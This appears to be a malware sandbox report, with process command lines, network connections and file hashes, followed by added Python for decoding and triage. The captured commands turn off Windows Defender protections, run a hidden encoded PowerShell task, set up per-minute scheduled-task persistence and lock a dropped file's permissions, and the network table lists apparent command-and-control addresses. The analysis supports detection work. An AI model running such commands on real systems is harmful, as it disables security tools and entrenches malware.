"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ffa96e146f8,0x7ffa96e14708,0x7ffa96e14718

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4068 -ip 4068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,17538133617654996007,11123633969690294482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,17538133617654996007,11123633969690294482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1

C:\Windows\system32\BackgroundTaskHost.exe

"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2qF343zA.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2qF343zA.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\2211.exe

C:\Users\Admin\AppData\Local\Temp\2211.exe

C:\Users\Admin\AppData\Local\Temp\2C91.exe

C:\Users\Admin\AppData\Local\Temp\2C91.exe

C:\Users\Admin\AppData\Local\Temp\2F71.exe

C:\Users\Admin\AppData\Local\Temp\2F71.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3709.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3392 -ip 3392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3392 -s 796

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3861.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Users\Admin\AppData\Local\Temp\3D8B.exe

C:\Users\Admin\AppData\Local\Temp\3D8B.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-AT01F.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AT01F.tmp\LzmwAqmV.tmp" /SL5="$8023C,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\697E.exe

C:\Users\Admin\AppData\Local\Temp\697E.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gmnfvIFNu" /SC once /ST 05:13:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gmnfvIFNu"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5996 -ip 5996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 584
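
Worked example (added here; it is not part of the sandbox report). Three things in the process list above are worth pulling out of the raw command lines. First, forfiles.exe is used as a proxy to start cmd.exe (Indirect Command Execution), and that cmd runs REG ADD against HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: an Exclusions\Extensions value named "exe" (a policy-level exclusion covering every executable) and Spynet\SpyNetReporting = 0 (cloud reporting off), each written with /reg:32 and /reg:64 because reg.exe is running from SysWOW64 and wants both registry views. Second, a scheduled task "gmnfvIFNu" is created and immediately run with hidden PowerShell; the -EncodedCommand blob is base64 of UTF-16LE and decodes to start-process -WindowStyle Hidden gpupdate.exe /force, most plausibly to make the just-written policy keys take effect. Third, CACLS sets the dropped copy explothe.exe and its parent directory to Admin:N and then adds Admin:R with /E, leaving the user read-only access to the file it just planted. The Python below decodes the blob and runs simple rules over a trimmed copy of the report's own command lines. The sample list, the tag names and the rule wording are ours, not the sandbox's.

```python
import base64
import re
from typing import Optional

# The -EncodedCommand blob exactly as it appears in the schtasks and
# powershell.EXE lines of this report.
ENC = ("cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAA"
       "SABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==")

# Constructed sample input: command lines copied from the process list above,
# trimmed to the ones the rules below care about.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD '
    r'\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" '
    r'/t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" '
    r'/f /v \"exe\" /t REG_SZ /d 0 /reg:64&"',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    'schtasks /CREATE /TN "gmnfvIFNu" /SC once /ST 05:13:01 /F /RU "Admin" '
    '/TR "powershell -WindowStyle Hidden -EncodedCommand ' + ENC + '"',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand ' + ENC,
    r'CACLS "explothe.exe" /P "Admin:N"',
    r'"C:\Windows\system32\schtasks.exe" /Query',
]

DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> list[str]:
    """Tag one command line with the behaviours seen in this report. Tag names are ours."""
    low = cmdline.lower()
    tags = []
    if "reg add" in low and DEFENDER_POLICY in low:
        if "\\exclusions\\" in low:
            tags.append("defender_policy_exclusion")        # policy-level exclusion (here: every .exe)
        if "spynetreporting" in low:
            tags.append("defender_maps_reporting_disabled")  # cloud (MAPS) reporting switched off
    if "forfiles" in low and " /c " in low:
        tags.append("forfiles_indirect_command_execution")  # LOLBin proxies the real command
    if "schtasks" in low and "/create" in low and "powershell" in low:
        tags.append("schtasks_launches_powershell")
    if "-windowstyle hidden" in low:
        tags.append("powershell_hidden_window")
    if low.startswith("cacls") and re.search(r'"[^"]*:n"', low):
        tags.append("cacls_deny_access_self_protect")       # user's rights on the dropped file removed
    return tags


def triage(cmdlines: list[str]) -> list[dict]:
    """Run every rule over a batch of command lines and decode any encoded PowerShell found."""
    rows = []
    for c in cmdlines:
        decoded = decode_encoded_command(c)
        tags = classify(c)
        if decoded and "gpupdate" in decoded.lower():
            tags.append("gpupdate_forced")                   # re-applies policy right after the REG ADDs
        rows.append({"cmdline": c, "tags": tags, "decoded": decoded})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_CMDLINES):
        print(", ".join(row["tags"]) or "-", "|", row["cmdline"][:70])
        if row["decoded"]:
            print("    decoded:", row["decoded"])
```

The rules key on substrings rather than on process ancestry on purpose: the cmd.exe children in this report show only the argument string (the "/C REG ADD ..." lines), so a rule that insists on seeing forfiles.exe as the parent would miss them in a plain command-line export.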

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 126.177.238.8.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
IE 163.70.151.35:443 www.facebook.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.96.0:80 stim.graspalace.com tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 tcp
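
Worked example (added here; not part of the sandbox report). The Network table mixes three kinds of rows: the sandbox's own reverse lookups (every 8.8.8.8:53 row whose name ends in .in-addr.arpa is a PTR query for an address it just saw, not attacker traffic), background browser traffic from msedge.exe (google.com, facebook.com, fbcdn.net), and the flows actually worth keeping: plain-HTTP connections to bare IPs with no hostname (77.91.68.29, 193.233.255.73, 5.42.65.80, 81.161.229.93, 171.22.28.213, 77.91.124.1), two non-standard ports (77.91.124.86:19084, contacted four times over the run, and 77.91.124.71:4341), and two resolved names that are not browser noise (iplogger.com, stim.graspalace.com). The Python below turns a trimmed copy of the table into that indicator list. The parser, the allowlist of browser domains and the reason strings are ours; the allowlist only marks rows as noise for this extraction and says nothing about those domains being safe in general.

```python
from dataclasses import dataclass
from typing import Optional

# Trimmed copy of the Network table above (constructed sample input: rows from
# the report, with most of the reverse-DNS and CDN rows left out for brevity).
NETWORK_TABLE = """
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
IE 163.70.151.35:443 www.facebook.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.86:19084 tcp
N/A 224.0.0.251:5353 udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.96.0:80 stim.graspalace.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 tcp
"""

# Assumption: domains the sandbox's own browser (msedge.exe) talks to in the
# background. Treated as noise for this extraction, not as "safe" in general.
BENIGN_SUFFIXES = ("google.com", "facebook.com", "fbcdn.net", "fbsbx.com")


@dataclass(frozen=True)
class Flow:
    country: str
    dest: str                 # "ip:port"
    domain: Optional[str]     # None when the row has no hostname column
    proto: str


def parse_flows(table: str) -> list[Flow]:
    """Parse 'Country Destination [Domain] Proto' rows; the Domain column is optional."""
    flows = []
    for line in table.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = None
        else:
            continue
        flows.append(Flow(country, dest, domain, proto))
    return flows


def _allowlisted(domain: str) -> bool:
    return any(domain == s or domain.endswith("." + s) for s in BENIGN_SUFFIXES)


def is_noise(flow: Flow) -> bool:
    """Resolver queries, PTR lookups, mDNS and allowlisted browser domains."""
    if flow.dest.endswith(":53") or flow.dest == "224.0.0.251:5353":
        return True
    if flow.domain and flow.domain.endswith(".in-addr.arpa"):
        return True
    return bool(flow.domain) and _allowlisted(flow.domain)


def indicator_reason(flow: Flow) -> str:
    ip, port = flow.dest.rsplit(":", 1)
    if port not in ("80", "443"):
        return "non-standard port"
    if flow.domain is None or flow.domain == ip:
        return "direct-to-IP HTTP (no hostname)"
    return "hostname not on allowlist"


def queried_domains(table: str) -> set[str]:
    """Forward DNS names asked of the resolver (PTR lookups excluded)."""
    return {f.domain for f in parse_flows(table)
            if f.dest.endswith(":53") and f.domain and not f.domain.endswith(".in-addr.arpa")}


def extract_indicators(table: str) -> dict[str, dict]:
    """Map ip:port -> {domain, proto, reason, hits} for every flow that is not noise."""
    out: dict[str, dict] = {}
    for flow in parse_flows(table):
        if is_noise(flow):
            continue
        entry = out.setdefault(flow.dest, {"domain": flow.domain, "proto": flow.proto,
                                           "reason": indicator_reason(flow), "hits": 0})
        entry["hits"] += 1
    return out


if __name__ == "__main__":
    for dest, info in sorted(extract_indicators(NETWORK_TABLE).items(),
                             key=lambda kv: -kv[1]["hits"]):
        print(f"{dest:22} {info['hits']:>2}x {info['proto']:4} "
              f"{info['domain'] or '-':22} {info['reason']}")
    print("DNS queries:", ", ".join(sorted(queried_domains(NETWORK_TABLE))))
```

Hit counts matter when turning this into a blocklist or a hunt: the bare-IP port-80 hosts are each touched once or a few times (payload fetches), while the port-19084 host is revisited throughout the run, which is the pattern to look for first when hunting for a beacon in proxy or NetFlow data.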

Files

memory/2380-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2380-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3324-2-0x0000000002C40000-0x0000000002C56000-memory.dmp

memory/2380-3-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CDCF.exe

MD5 77b123be5dd076e1eb33e6b76bc2d7db
SHA1 7087410d1f0dc060b80044ad5b63fc77ca60ec32
SHA256 32f43f514377ea626a7f5025cde471e6e1543b46c72193c7c312a7c634aee3d9
SHA512 6977771a6165d15149a417d357b5b295936d9b30a130f45b3e032a7d5d93808f2bffaca18ce0c89b6ef7de23d52ae5db23599d55c3de0917a60c2141abb46091

C:\Users\Admin\AppData\Local\Temp\CDCF.exe

MD5 77b123be5dd076e1eb33e6b76bc2d7db
SHA1 7087410d1f0dc060b80044ad5b63fc77ca60ec32
SHA256 32f43f514377ea626a7f5025cde471e6e1543b46c72193c7c312a7c634aee3d9
SHA512 6977771a6165d15149a417d357b5b295936d9b30a130f45b3e032a7d5d93808f2bffaca18ce0c89b6ef7de23d52ae5db23599d55c3de0917a60c2141abb46091

C:\Users\Admin\AppData\Local\Temp\CF57.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
